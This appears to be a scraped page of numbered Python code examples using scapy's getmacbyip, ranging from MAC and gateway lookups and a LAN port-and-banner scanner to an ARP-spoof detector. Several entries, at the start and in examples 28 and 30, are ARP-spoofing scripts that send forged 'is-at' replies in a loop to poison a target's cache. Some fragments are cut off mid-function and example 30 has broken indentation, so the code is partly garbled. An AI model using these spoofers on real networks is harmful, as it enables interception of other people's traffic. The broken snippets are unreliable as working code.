    target_mac = getmacbyip(target_ip)
    host_mac = getmacbyip(host)
    # Forged reply: ``host``'s IP as sender, hwsrc left to scapy's default.
    pkt = Ether() / ARP(
        op='is-at', psrc=host, pdst=target_ip, hwdst=target_mac)
    # show() prints the packet and returns None, so print() adds a "None" line.
    print(pkt.show())
    try:
        # loop=1 with inter=2: resend every two seconds until interrupted.
        sendp(pkt, inter=2, loop=1)
    except KeyboardInterrupt:
        print('Cleaning...')
        # Re-advertise host's resolved MAC three times, one second apart, so
        # the target's cache returns to the real binding.
        sendp(Ether(src=host_mac) / ARP(op='is-at',
                                        psrc=host,
                                        hwsrc=host_mac,
                                        pdst=target_ip,
                                        hwdst=target_mac),
              inter=1,
              count=3)
示例#28
import os
import sys
from scapy.layers.l2 import getmacbyip
from scapy.all import (
  Ether,
  ARP,
  sendp
)

# Python 2 script (print statement, raw_input).
# os.system() returns the command's exit status, not its output: ifconfig
# writes to the terminal itself and the print below shows the status code.
ifconfig=os.system('ifconfig')
print ifconfig
# NOTE(review): the prompt asks for the gateway IP, but the value is later
# used as hwsrc (a MAC field) in arpspoof().
gmac=raw_input('Please enter gateway IP:')
liusheng=raw_input('Please enter your IP:')
liusrc=raw_input('Please enter target IP:')
try:
  # Resolve the target's MAC; getmacbyip returns None when it cannot.
  tg=getmacbyip(liusrc)
  print tg
except Exception , f:
    print '[-]{}'.format(f)
    exit()
def arpspoof():
  try:
    eth=Ether()
    arp=ARP(
        op="is-at",
        hwsrc=gmac,
        psrc=liusheng,
        hwdst=tg,
        pdst=liusrc
    )
    print ((eth/arp).show())
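def check_ip_mac(packet):
    """Return True when an ARP reply's sender MAC disagrees with a fresh lookup.

    Only ARP replies (op == 2) are examined. Any other packet, including one
    without an ARP layer, yields False instead of ``None`` or an IndexError,
    so the function is safe to use directly as a sniff callback predicate.

    Args:
        packet: a sniffed scapy packet.

    Returns:
        bool: True if ``getmacbyip(psrc)`` differs from the advertised
        ``hwsrc`` or cannot be resolved at all, False otherwise.
    """
    if ARP not in packet or packet[ARP].op != 2:
        return False

    proposed_ip = packet[ARP].psrc
    advertised_mac = packet[ARP].hwsrc

    # NOTE(review): this lookup is itself answered over ARP (or from scapy's
    # cache) on the same segment, so a spoofer can influence it. Comparing
    # against a pinned table of known-good bindings is more robust.
    resolved_mac = getmacbyip(proposed_ip)
    if resolved_mac is None:
        # Nothing independent to compare with; treated as a mismatch so the
        # reply is still surfaced.
        return True

    # Case-insensitive, so differently formatted hex digits do not raise a
    # false alarm.
    return resolved_mac.lower() != advertised_mac.lower()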
示例#30
from scapy.layers.l2 import getmacbyip
from scapy.all import (
    Ether,
    ARP,
    sendp
)
    
# Run the command that shows the interface configuration.
# os.system() returns the exit status, so the print shows a status code.
ifconfig=os.system('ifconfig')
print ifconfig
gmac=raw_input('Please enter gateway IP:')
liusheng=raw_input('Please enter your IP:')
liusrc=raw_input('Please enter target IP:')
try:
# Resolve the target's MAC
    tg=getmacbyip(liusrc)
    print tg
except Exception , f:
print '[-]{}'.format(f)
exit()
def arpspoof():
    try:
eth=Ether()
arp=ARP(
    op="is-at", #arp响应
    hwsrc=gmac, #网关mac
    psrc=liusheng,#网关IP
    hwdst=tg,#目标Mac
    pdst=liusrc#目标IP
)
#对配置进行输出
示例#31
文件: getmac.py 项目: Frizz925/getmac
def _scapy_ip(ip):
    """Resolve ``ip`` to a MAC address through scapy's ``getmacbyip``.

    scapy is imported inside the function, so it is only needed when this
    lookup method is actually used. Requires root permissions on POSIX
    platforms; Windows does not have this limitation.
    """
    from scapy.layers import l2
    return l2.getmacbyip(ip)
示例#32
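def _lookup_hostname(address):
    """Return the reverse-DNS name of *address*, or 'unknown' if it has none."""
    try:
        # gethostbyaddr returns (name, aliases, [IPs])
        return socket.gethostbyaddr(address)[0]
    except (socket.herror, socket.gaierror):
        return 'unknown'


def local_scan():
    """Scan the local /24 for hosts, open ports and service banners, and print a report.

    Steps: determine the local IP, build the address list according to
    ``config.ip_list_setting`` (3 = whole last octet, 2 = manual list,
    anything else = ping sweep), port-scan the list, collect MAC, vendor and
    hostname per responsive host, print the table, and grab banners when any
    open port was found.

    A host without a reverse-DNS record used to abort the whole scan with
    ``socket.herror``; such hosts are now listed with the name 'unknown'.

    NOTE(review): hostnames and banners are supplied by the scanned devices
    and are printed unmodified; control characters in them reach the
    terminal as-is.
    """
    ipl = get_lan_ip()  # Local IP

    print('\nYour local IP is: {}'.format(ipl))

    if ip_check_local(ipl) is False:
        print('Your address does not appear to be from a local network. Aborting scan.')
        return

    mode = config.ip_list_setting
    if mode == 3:
        print('Skipping ping sweep.')
        print('Scanning all IPs in the last IP octet range (like in a /24 subnet).')
        ip_list = generate_ips(ipl)
    elif mode == 2:
        print('Skipping ping sweep.')
        print('Scanning manually entered IPs.')
        ip_list = config.manual_ip_list
    else:
        print('Ping sweeping the IPs in the last IP octet range (like in a /24 subnet).')
        ip_list = ping_sweep.get_ip_list(ipl)

    print(ip_list)

    print('Scanning for open ports on found hosts...')
    ports_by_ip = multithread_scan(ip_list, port_scan)

    print('Acquiring host data...')
    start_time = time.time()
    data_list = []
    for address in ip_list:
        mac = getmacbyip(address)  # TODO this needs a timeout for optimisation

        # No answer means the host was unresponsive.
        # It only matters when skipping ping sweep.
        if mac is None:
            continue
        mac_addr = str(mac)

        hostname = _lookup_hostname(address)
        vendor = mac_vendor.get_str(mac_addr)

        ports = get_ports(address, ports_by_ip)
        ports.sort()

        data_list.append([address, hostname, ports, mac_addr, vendor])

    print("Duration: {} seconds".format(time.time() - start_time))
    # TODO sort the data_list

    print('\nNote: Your host might return ff:ff:ff:ff:ff:ff.\n')

    # Display hosts with found ports
    row_format = "{:<15} {:<20} {:<20} {:<35} {}"
    print(row_format.format('IP', 'Name', 'MAC', 'Vendor', 'List of open ports'))
    print(row_format.format('-'*15, '-'*16, '-'*17, '-'*30, '-'*18))

    open_ports = []
    for address, hostname, ports, mac_addr, vendor in data_list:
        print(row_format.format(address, hostname, mac_addr, vendor, ports))
        for port in ports:
            if port not in open_ports:
                open_ports.append(port)

    if not open_ports:
        print('\nNo ports belonging to potentially dangerous services have been found.')
        return

    print('\nPorts belonging to potentially vulnerable services have been found on one or more of\n'
          'the devices in your local network. Make sure to investigate and close or secure them.')

    open_ports.sort()

    print('\nThe services on those ports are:')
    for port in open_ports:
        print('─ {} ({})'.format(port, services.get(port)))

    print('Grabbing banners for all services. This might take a minute...')
    banner_data = multithread_scan(ports_by_ip, banner_grab)
    for row in banner_data:
        ip_address = row[0]
        banner_by_port_list = row[1]

        print('{} ({})'.format(ip_address, _lookup_hostname(ip_address)))

        for port, banner in ((entry[0], entry[1]) for entry in banner_by_port_list):
            print('\tPort: {}'.format(port))
            print('\t\t{}'.format(banner))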
示例#33
文件: sniff.py 项目: wsxq2/hack
def main():
    """Print the MAC that scapy resolves for a fixed address (Python 2 print)."""
    # sniff(filter='icmp', prn=prn)
    # getmacbyip returns None when the address does not answer.
    print getmacbyip('192.168.56.16')
示例#34
def get_mac(tgt_ip):
    """Return the MAC that ``getmacbyip`` resolves for ``tgt_ip``.

    When the lookup fails a message is printed and ``None`` is returned.
    """
    mac = getmacbyip(tgt_ip)
    if mac is None:
        print("无法获取IP为:%s 主机的MAC地址,请检查目标IP是否存活" % tgt_ip)
    return mac
示例#35
def getway():
    """Return ``(default gateway IP, gateway MAC)`` for this host.

    The IP is read from ``netifaces.gateways()["default"][2][0]`` and the MAC
    from ``getmacbyip``; the MAC is ``None`` when the gateway does not
    answer.
    """
    # Key 2 is presumably netifaces.AF_INET (its value on Linux) -- confirm.
    default_routes = netifaces.gateways()["default"]
    gateway_ip = default_routes[2][0]
    return gateway_ip, getmacbyip(gateway_ip)